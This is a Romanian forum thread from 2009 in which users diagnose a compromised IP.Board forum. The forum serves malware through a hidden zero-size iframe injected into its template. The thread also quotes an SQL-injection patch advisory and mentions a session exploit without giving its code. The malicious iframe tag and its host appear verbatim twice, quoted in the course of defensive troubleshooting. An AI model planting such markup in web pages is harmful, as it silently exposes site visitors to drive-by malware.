[casper20]

Navigand astazi pe forum a inceput virusul sa dea atentionare dupa atentionare de virus de fiecare data cand treceam in alta pagina a forumului. Acuma la mine merge din ce in ce mai greu foumul, in rest nu am problemecu alte pagini sau cu calculatorul, am dat si o scanare complecta si nu a gasit nimica.
Asta a gasit la mine antivirusul:

http://telepopki.php...index.php\index
JS:Packed-I [Trj]
Cal Troian
090127-0, 01/27/2009

Pe pagina de forum sau in orice subiect intram.

[bethowen]

Si eu am probleme , ma tot redirectioneaza la alta adresa.....

casper20, la Jan 27 2009, 06:54 PM, a spus:

Navigand astazi pe forum a inceput virusul sa dea atentionare dupa atentionare de virus de fiecare data cand treceam in alta pagina a forumului. Acuma la mine merge din ce in ce mai greu foumul, in rest nu am problemecu alte pagini sau cu calculatorul, am dat si o scanare complecta si nu a gasit nimica.
Asta a gasit la mine antivirusul:

http://telepopki.php...index.php\index
JS:Packed-I [Trj]
Cal Troian
090127-0, 01/27/2009

Pe pagina de forum sau in orice subiect intram.

[dan_mitea]

Idem.

[Marinaru]

Cu Firefox nu sunt probleme!

[dan_mitea]

Vad ca s-a trezit si Symantec-ul. Acum este ok.

[protheus]

casper20, la Jan 27 2009, 06:54 PM, a spus:

Navigand astazi pe forum a inceput virusul sa dea atentionare dupa atentionare de virus de fiecare data cand treceam in alta pagina a forumului. Acuma la mine merge din ce in ce mai greu foumul, in rest nu am problemecu alte pagini sau cu calculatorul, am dat si o scanare complecta si nu a gasit nimica.
Asta a gasit la mine antivirusul:

http://telepopki.php...index.php\index
JS:Packed-I [Trj]
Cal Troian
090127-0, 01/27/2009

Pe pagina de forum sau in orice subiect intram.

Linkul dat de tine imi scrie ca e unsecure in opera, imi taie redirectionarea automat, nu ma lasa sa il accesez.

Va recomand versiunile cele mai noi la orice browser aveti, dar recomand utilizarea a ceva renumit, cum ar fi Opera, Firefox, mai nou Google Chrome si altele.

[sebi_p]

In template-ul forumului e problema , asa ca orice pagina din forum duce la pop-up.
"<iframe src="http://www.apelsin-agency.com/traff/go.php?sid=1" frameborder=0 width=0 height=0></iframe>"

Aceasta postare a fost editata de sebi_p: 27 January 2009 - 08:34 PM

[protheus]

Se pare ca spamul e in floare de cand cu criza finaciara internationala....

[Calin]

intr-adevar securitatea pe acest forum a fost compromisa!
Aparent un bot a reusit sa intre in pannelul de administrare si sa modifice o tema inserand acest iframe care-si cam face de cap injectand bannere ascunse si pop-up-uri.
Acum stau si ma intreb cand vom primi spamuri la adresele de email in mod normal non accesibile oricui.

Aviz Adminilor! Daca aveti nevoie de ajutor imi ofer cu placere asistenta.

[casper20]

Kriminel, la Jan 27 2009, 09:44 PM, a spus:

intr-adevar securitatea pe acest forum a fost compromisa!
Aparent un bot a reusit sa intre in pannelul de administrare si sa modifice o tema inserand acest iframe care-si cam face de cap injectand bannere ascunse si pop-up-uri.
Acum stau si ma intreb cand vom primi spamuri la adresele de email in mod normal non accesibile oricui.

Aviz Adminilor! Daca aveti nevoie de ajutor imi ofer cu placere asistenta.

Daca mai este nevoie de o mana buna va pota ajuta, doar termin anul asta faculta de info.

[Calin]

Citeaza

IP.Board 2.2.x and 2.3.x Security Patch

We have released a single-file security patch which impacts IP.Board 2.2.x and 2.3.x versions. This is a critical update. Please apply the patch as soon as possible or contact our technical support via the client area if you need assistance.

Issue

It is possible to perform a remote SQL exploit and inject SQL code in an existing IPB query.

Patching Your Board

If you have downloaded your IP.Board after the time of this announcement, the patch is already included in your files. To patch an existing installation, simply download the attached file and overwrite: sources/action_public/xmlout.php

xmlout.zip

Mai sunt si alte exploituri, fac si eu niste teste acuma...

sursa:

[Romulus]

Kriminel, versiunea de IPB actuala e ultima: 2.3.5

[Calin]

Patchul este valabil in cazul versiunilor 2.2.x si 2.3.x

[sebi_p]

Kriminel, la Jan 27 2009, 10:21 PM, a spus:

Mai sunt si alte exploituri, fac si eu niste teste acuma...

sursa:

Vreun admin prezent care sa aplice patch-ul?

[Calin]

trebuie aplicat patch-ul si curatat manual template-ul actual.

Pana acum doar acel iframe a fost injectat, in footer dupa copyright.
Mi-e ca nu e doar SQL inject, exploitul ce l-am gasit lucreaza din greu pe contul de admin. Si nu cu brute force ce cu un exploit al session managerului din IPB. Deci e clar ca s-a logat cu un cont cu permisiuni mari si a modificat template-ul direct din pannel.

Aceasta postare a fost editata de Kriminel: 27 January 2009 - 10:47 PM

[porcofon]

Nu am avut timp sa citesc toate posturile din acest thread. deci, daca s-a spus deja imi cer scuze.

Troianul aparut este usor de scos si de evitat. afecteaza doar internet explorer si vine pe porturi administrate de firewall.
Inca nu am gasit exact pe ce porturi.
De inlaturat, e simplu... un scan cu nod32 updatat la zi.
Nu pot pune link-uri si nici nu pot spune mai multe aici. Daca aveti nevoie de ajutor.. gasiti ym-ul meu in profil.

[Calin]

citeste posturile porcofon, nu e nici vorba de vre-un troian ce infecteaza IE. Firefox opera si alte browsere sunt afectate deoarece e un EXPLOIT ce a modificat codul acestui forum.

[porcofon]

Kriminel, la Jan 27 2009, 11:00 PM, a spus:

citeste posturile porcofon, nu e nici vorba de vre-un troian ce infecteaza IE. Firefox opera si alte browsere sunt afectate deoarece e un EXPLOIT ce a modificat codul acestui forum.

am apucat sa arunc o privire pe posturi... ceva e gresit
mie mi-a sarit in aer nod-ul in momentul in care am testat ce se intampla cu forumul daca il deschid cu ie.
"Trojan-Downloader.Win32.Agent.aukz" este ce mi-a venit de pe serverul rhc.
Aici sunt ceva info despre el.
ce nu gasesc inca e unde si cum se infiltreaza pe server.
din pacate internet providerul meu nu imi permite o scanare amanuntita a serverului rhc... asa ca ma joc un pic de-a "baba-oarba" in depistarea problemei...

Aceasta postare a fost editata de porcofon: 27 January 2009 - 11:09 PM

[sebi_p]

porcofon, la Jan 27 2009, 11:07 PM, a spus:

am apucat sa arunc o privire pe posturi... ceva e gresit
mie mi-a sarit in aer nod-ul in momentul in care am testat ce se intampla cu forumul daca il deschid cu ie.
"Trojan-Downloader.Win32.Agent.aukz" este ce mi-a venit de pe serverul rhc.
Aici sunt ceva info despre el.
ce nu gasesc inca e unde si cum se infiltreaza pe server.
din pacate internet providerul meu nu imi permite o scanare amanuntita a serverului rhc... asa ca ma joc un pic de-a "baba-oarba" in depistarea problemei...

Daca citesti cu atentie toate posturile o sa vezi unde e problema si cum s-a infiltrat pe server si ce ti-a venit de pe serverul rhc. Si in privinta scanarii amanuntite: Atentie !!! . Daca nu e ceruta poate fi considerata o tentativa de atac la server ... Si despre scanarea cu nod32 a board-ului ....

Aceasta postare a fost editata de sebi_p: 27 January 2009 - 11:17 PM

[porcofon]

sebi_p, la Jan 27 2009, 11:16 PM, a spus:

Daca citesti cu atentie toate posturile o sa vezi unde e problema si cum s-a infiltrat pe server si ce ti-a venit de pe serverul rhc. Si in privinta scanarii amanuntite: Atentie !!! . Daca nu e ceruta poate fi considerata o tentativa de atac la server ... Si despre scanarea cu nod32 a board-ului ....

cunosc regulile instituirii starii de atac la server...
oricum.. scanarea cu nod e posibil sa nu dea rezultate dupa instalarea micutului. (scanarea cu nod era pentru userii rhc, nu pentru server sau sursa)

[Calin]

acel iframe incarca o pagina care la randul ei incearca sa infecteze cat poate orice browser. Antivirusii sar ca arsi deoarece se incearca incarcarea unor activeX-uri sau chiar descarcarea unor executabile ca "Youtube.viewer.exe" care bineinteles sunt virusi/troiani, in fine.

Casper a dat mai sus linkul catre pagina din iframe, cei slabi de inger sa nu intre dar daca va uitati in sursa ei vedeti cate marsavii incearca sa faca.

Rusii ne-au facut din nou :unsure:

[dan_mitea]

Cred ca s-a rezolvat. Se pare ca merge.

[renatoa]

OK, fara nici un AV, dar cu toate patch-urile la zi si firewall hard, se pare ca XP SP3 si IE8 RC1, lansat luni, au rezistat la aceste marsavii fara urmari detectabile.

[sebi_p]

renatoa, la Jan 28 2009, 07:49 AM, a spus:

OK, fara nici un AV, dar cu toate patch-urile la zi si firewall hard, se pare ca XP SP3 si IE8 RC1, lansat luni, au rezistat la aceste marsavii fara urmari detectabile.

Vad ca tot nu s-a inlaturat din template <iframe src="http://www.apelsin-agency.com/traff/go.php?sid=1" frameborder=0 width=0 height=0></iframe> .... Asta redirecteaza la cutia pandorei.

[SILVIU66]

se lucreaza,rabdare

[morph]

Btw, si google chrome tipa ca e site-ul cu probleme.

[Calin]

renatoa, la Jan 28 2009, 07:49 AM, a spus:

OK, fara nici un AV, dar cu toate patch-urile la zi si firewall hard, se pare ca XP SP3 si IE8 RC1, lansat luni, au rezistat la aceste marsavii fara urmari detectabile.

nu are nici o legatura browserul firewallu xp-u si alte dume cu acest exploit. Forumul a fost cel exploatat nu calculatoarele voastre. Ori calculatoarele voastre executa ce-i zice forumu' din moment ce-l accesezi. Daca codul forumului este compromis injectandu-se cod (iframe-ul in cauza), ORICE browser va afisa continutul acelui frame si prin 40 jde mii de firewalluri "hard" si alte vrajeli ieftine.


@Webmaster, este un exploit ce ia contul de admin printr-un fel de brute force la session manager. Daca este rulat dupa ce un admin a fost logat si nu a cerut expres logout (clear session) va putea sa foloseasca acel key pentru logare si chiar spoofare a ip-ului. Am rulat acel exploit cam 30 de minute aseara timp in care nu a gasit nimic. Daca mai e nevoie va stau la dispozitie cu explicatiile codului, din motive evidente nu-l voi pune aici.

Numai bine,
Calin

[Abburo]

Se pare ca cineva insista iar problema are recurenta!!!

Mie acum mi se redirecteaza catre un fsier PDF aparent gol

[Calin]

da, problema a reaparut.